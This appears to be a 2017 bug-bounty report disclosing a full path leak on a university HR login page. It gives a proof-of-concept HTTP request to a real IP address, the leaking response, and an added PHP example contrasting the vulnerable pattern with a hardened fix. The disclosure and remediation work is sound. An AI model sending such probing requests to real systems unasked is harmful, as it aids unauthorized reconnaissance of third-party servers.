International Islamic University Chittagong: Full Path Disclosure

2017-10-30T16:39:54
ID H1:284250
Type hackerone
Reporter mrreboot
Modified 2017-10-31T05:14:36

Description

Hi Team, I would like to report a sensitive info disclosure via the login page.

PoC:

Send the request below to see the path disclosure.

```
GET /hrd/logining.php HTTP/1.1
Host: 119.18.148.140
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=uga9lkg0vflffh4983qaitalj7
Connection: close
Upgrade-Insecure-Requests: 1
```

The response looks like this:

```
HTTP/1.1 302 Found
Date: Mon, 30 Oct 2017 16:35:47 GMT
Server: Apache/2.4.25 (Debian)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: login.php?error=User ID or Password does not find.
Content-Length: 231
Connection: close
Content-Type: text/html; charset=UTF-8

<br />
<b>Notice</b>: Undefined index: user_id in <b>/var/www/html/hrd/logining.php</b> on line <b>9</b><br />
<br />
<b>Notice</b>: Undefined index: user_password in <b>/var/www/html/hrd/logining.php</b> on line <b>10</b><br />
```

Fix:

Hide internal server paths.

Regards, Mr.R3boot.
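The notices in the response come from a script that reads `$_POST['user_id']` and `$_POST['user_password']` on a bare GET request, where neither key exists, while PHP is configured to print errors into the page. The following is an added illustration, not the site's code (which the report does not show): a hypothetical `logining.php` with the pattern that produces such notices beside a hardened version. Only the two field names are taken from the notices; everything else is assumed.

```php
<?php
// Added example, not the site's code. The field names user_id and
// user_password come from the notices in the report; the rest is assumed.

// --- Pattern that produces the notices seen in the report ---
// Reading a key that is absent on a GET request raises an E_NOTICE. With
// display_errors=On, PHP writes the notice, including the absolute script
// path and line number, into the HTTP response body.
function login_leaky(): void
{
    $user_id  = $_POST['user_id'];        // Notice: Undefined index: user_id
    $password = $_POST['user_password'];  // Notice: Undefined index: user_password
    // ... authentication against the user store would follow ...
}

// --- Hardened version ---
// 1. Only accept POST; refuse other methods before touching form data.
// 2. Read form fields with filter_input(), which returns null for a missing
//    key without raising a notice.
// 3. Validate presence explicitly and redirect with a generic error.
function login_hardened(): void
{
    if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
        header('Allow: POST');
        http_response_code(405);
        return;
    }

    $user_id  = filter_input(INPUT_POST, 'user_id', FILTER_DEFAULT);
    $password = filter_input(INPUT_POST, 'user_password', FILTER_DEFAULT);

    if ($user_id === null || $password === null ||
        $user_id === '' || $password === '') {
        header('Location: login.php?error=invalid');
        return;
    }
    // ... authentication against the user store would follow ...
}

// Production error handling. This belongs in php.ini or the server config;
// shown here with ini_set() so the example is self-contained:
//   display_errors = Off   ; nothing about the server reaches the client
//   log_errors     = On    ; notices still reach the error log for developers
//   error_log      = /var/log/php/app.log   (assumed path)
ini_set('display_errors', '0');
ini_set('log_errors', '1');
```

The code fix removes the notice at its source; the configuration change is what actually closes the disclosure, since any other notice or warning in the application would otherwise leak the same path.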